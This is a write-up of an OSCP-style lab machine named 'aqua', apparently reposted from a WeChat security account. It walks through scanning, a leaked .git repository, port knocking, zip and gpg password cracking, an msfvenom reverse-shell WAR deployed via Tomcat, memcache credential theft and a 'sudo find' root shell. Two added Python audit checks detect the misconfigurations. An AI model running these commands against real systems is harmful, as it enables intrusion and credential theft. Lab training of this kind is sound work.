OSCP Lab
Lab introduction
aqua |
medium |
tomcat, zip brute force, exploiting a .git information leak, gpg brute force, memcache, sudo find privilege escalation |
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scanning
└─$ nmap -sV -A -p- -Pn -T4 192.168.1.19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-24 09:47 +06
Nmap scan report for Atlantis (192.168.1.19)
Host is up (0.00074s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)
| 256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)
|_ 256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Todo sobre el Agua
|_http-server-header: Apache/2.4.29 (Ubuntu)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.65 seconds
Directory scanning
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.19 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.19
[+] Method: GET
[+] Threads: 10
[+] Wordlist: pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.19/.html (Status: 403) [Size: 277]
http://192.168.1.19/index.html (Status: 200) [Size: 2883]
http://192.168.1.19/.php (Status: 403) [Size: 277]
http://192.168.1.19/img (Status: 301) [Size: 310] [--> http://192.168.1.19/img/]
http://192.168.1.19/css (Status: 301) [Size: 310] [--> http://192.168.1.19/css/]
http://192.168.1.19/robots.txt (Status: 200) [Size: 33]
http://192.168.1.19/.html (Status: 403) [Size: 277]
http://192.168.1.19/.php (Status: 403) [Size: 277]
http://192.168.1.19/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.19/SuperCMS -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.19/SuperCMS
[+] Method: GET
[+] Threads: 10
[+] Wordlist: pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.19/SuperCMS/.php (Status: 403) [Size: 277]
http://192.168.1.19/SuperCMS/index.html (Status: 200) [Size: 799]
http://192.168.1.19/SuperCMS/.html (Status: 403) [Size: 277]
http://192.168.1.19/SuperCMS/img (Status: 301) [Size: 319] [--> http://192.168.1.19/SuperCMS/img/]
http://192.168.1.19/SuperCMS/login.html (Status: 200) [Size: 2146]
http://192.168.1.19/SuperCMS/css (Status: 301) [Size: 319] [--> http://192.168.1.19/SuperCMS/css/]
http://192.168.1.19/SuperCMS/js (Status: 301) [Size: 318] [--> http://192.168.1.19/SuperCMS/js/]
http://192.168.1.19/SuperCMS/.php (Status: 403) [Size: 277]
http://192.168.1.19/SuperCMS/.html (Status: 403) [Size: 277]
The login check here is done in the front end; after logging in there is an image, and a hidden base64 string is also present.
Decoding it gives the text below. My guess was a password dictionary, but what is 1=2?
┌──(kali㉿kali)-[~]
└─$ echo "MT0yID0gcGFzc3dvcmRfemlwCg==" | base64 -d
1=2 = password_zip
In the HTML source of the home page, 1 and 2 turn up: they correspond to agua=H20. What it is for is not yet clear, so set it aside and keep gathering information.
Checking the image for hidden data turned up nothing; re-scanning the directories revealed a .git information leak.
Use a tool to dump the git repository
https://github.com/arthaud/git-dumper
After dumping, inspect git log; a suspicious file knocking_on_Atlantis_door.txt appears
Looking at the detailed log, the commit note contains what looks like a port-knocking hint
git diff 3b7e4b8bb0eeb8557fc3ab0b9e7acec16431150a
git diff 58afe63a1cd28fa167b95bcff50d2f6f011337c1
So we use knock on these three ports and then rescan; a new FTP port is now accessible
└─$ knock 192.168.1.19 1100 800 666 -v
hitting tcp 192.168.1.19:1100
hitting tcp 192.168.1.19:800
hitting tcp 192.168.1.19:666
Anonymous FTP access eventually yields a backup file
Presumably it contains Tomcat login credentials, which would allow gaining access by deploying a package.
A password is also needed to extract the archive.
Use zip2john to extract the archive's hash and brute-force the password
After extraction, the Tomcat login password is obtained
Gaining access
Log into the Tomcat manager with the password; from here it is the usual routine: deploy a WAR package.
┌──(kali㉿kali)-[~]
└─$ msfvenom -p linux/x64/shell_reverse_tcp lhost=192.168.1.76 lport=9088 -f war > boor.war
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of war file: 1567 bytes
After uploading the WAR package, visiting it yields a shell
Privilege escalation
A linpeas.sh scan shows a memcache service; netstat shows the port as well
When 11211 is bound to 0.0.0.0, any address can connect to it
We connect directly with telnet; item1 holds 5 keys
telnet 127.0.0.1 11211
Credentials are stored there; a direct get retrieves the password of user tridente. Connect over SSH to get the user.txt flag
Escalating to root from here is fairly simple: https://gtfobins.github.io/gtfobins/find/
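The memcached exposure above comes down to one bind setting. The following audit check is an added example for this walkthrough, not code from the original post: it parses `netstat -tlnp` output and flags LISTEN sockets bound to a wildcard address on ports that should stay on loopback. The netstat sample is constructed, and the port list (11211 for memcached, 8009 for Tomcat AJP) is an assumption of this example.

```python
"""Audit check: flag services that listen on every interface but should stay on loopback.

Added example for this walkthrough, not code from the original post. The netstat
sample below is constructed; the port list is an assumption of this example.
"""

# Ports that, on a host like this one, should only be reachable from localhost.
# 11211 (memcached) is the case the walkthrough abuses; 8009 (Tomcat AJP) is
# included as an assumption of this example.
LOOPBACK_ONLY_PORTS = {
    11211: "memcached",
    8009: "ajp13",
}

# Addresses that mean "all interfaces" in netstat output.
WILDCARD_ADDRS = {"0.0.0.0", "::", "*"}

# Constructed sample of `netstat -tlnp` output (not captured from the lab host).
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:11211           0.0.0.0:*               LISTEN      954/memcached
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1020/mysqld
tcp6       0      0 :::8009                 :::*                    LISTEN      1101/java
tcp6       0      0 :::8080                 :::*                    LISTEN      1101/java
"""


def split_local_address(local):
    """Split netstat's 'addr:port' column into (addr, port); works for ':::8009' too."""
    addr, _, port = local.rpartition(":")
    return addr, int(port)


def find_exposed_services(netstat_output):
    """Return one finding per LISTEN socket bound to a wildcard address on a loopback-only port."""
    findings = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Listening TCP rows have: proto recv-q send-q local foreign state pid/program
        if len(fields) < 7 or not fields[0].startswith("tcp") or fields[5] != "LISTEN":
            continue
        addr, port = split_local_address(fields[3])
        if addr in WILDCARD_ADDRS and port in LOOPBACK_ONLY_PORTS:
            findings.append({
                "port": port,
                "service": LOOPBACK_ONLY_PORTS[port],
                "bind": addr,
                "program": fields[6],
            })
    return findings


if __name__ == "__main__":
    for f in find_exposed_services(SAMPLE_NETSTAT):
        print(f"{f['service']} ({f['program']}) listens on {f['bind']}:{f['port']}; bind it to 127.0.0.1")
```

On Debian and Ubuntu, memcached reads /etc/memcached.conf, where `-l 127.0.0.1` restricts the listener to loopback; memcached has no authentication of its own, so anything stored in it (here, a user's password) is readable by whoever can reach the port.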
sudo find . -exec /bin/sh \; -quit
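The sudo rule behind that one-liner is a classic sudoers audit finding. The following check is an added example for this walkthrough, not code from the original post: it parses sudoers user-spec lines and flags any non-root user allowed to run a shell-capable binary (find with -exec, as here) as root. The sudoers excerpt is constructed; the real rule on the lab host is not shown in the post, and the SHELL_CAPABLE list is an assumption of this example.

```python
"""Audit check: flag sudoers rules that let a user run a shell-capable binary as root.

Added example for this walkthrough, not code from the original post. The sudoers
excerpt below is constructed (the real rule on the lab host is not shown in the post).
"""
import os
import re

# Binaries that can spawn a shell or run arbitrary commands from inside sudo
# (find with -exec, as used in the walkthrough, is the example here). Assumed list.
SHELL_CAPABLE = {"find", "vi", "vim", "less", "more", "awk", "perl", "python3", "bash", "sh"}

# Constructed sudoers excerpt (hypothetical rules, not taken from the lab).
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
tridente ALL=(root) NOPASSWD: /usr/bin/find
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart tomcat
"""

# user  host=(runas) [TAG:] command, command ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^[A-Z]+:$")  # NOPASSWD:, SETENV:, ...


def parse_rule(line):
    """Parse one user-spec line into (user, runas, [(tags, binary_path), ...]); None if not a rule."""
    if not line.strip() or line.lstrip().startswith(("#", "Defaults")):
        return None
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    commands = []
    for cmd in m.group("cmds").split(","):
        tokens = cmd.split()
        tags = {t for t in tokens if TAG_RE.match(t)}
        words = [t for t in tokens if not TAG_RE.match(t)]
        if words:
            commands.append((tags, words[0]))  # first word is the binary path (or ALL)
    return m.group("user"), m.group("runas") or "root", commands


def find_risky_sudo_rules(sudoers_text):
    """Return rules where a non-root user may run a shell-capable binary as root."""
    findings = []
    for line in sudoers_text.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        user, runas, commands = parsed
        if user == "root":
            continue
        for tags, binary in commands:
            runas_user = runas.split(":")[0]  # "(user:group)" form: keep the user part
            if os.path.basename(binary) in SHELL_CAPABLE and runas_user in ("root", "ALL"):
                findings.append({"user": user, "binary": binary, "nopasswd": "NOPASSWD:" in tags})
    return findings


if __name__ == "__main__":
    for f in find_risky_sudo_rules(SAMPLE_SUDOERS):
        print(f"{f['user']} may run {f['binary']} as root (NOPASSWD={f['nopasswd']}); remove or replace this rule")
```

Run it over /etc/sudoers and each file under /etc/sudoers.d/; restricting arguments does not help for binaries like find, so the remediation is to drop the rule or replace it with a purpose-built wrapper script that takes no user-controlled arguments.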
The root flag, though, was a first for me. What kind of encrypted file has a .gpg extension? Download it directly
It needs brute-forcing again; use gpg2john to extract the hash and crack it
┌──(kali㉿kali)-[~/下载]
└─$ gpg2john root.txt.gpg > hash
File root.txt.gpg
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash
Decryption succeeds and the root flag is obtained
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP-Medium】aqua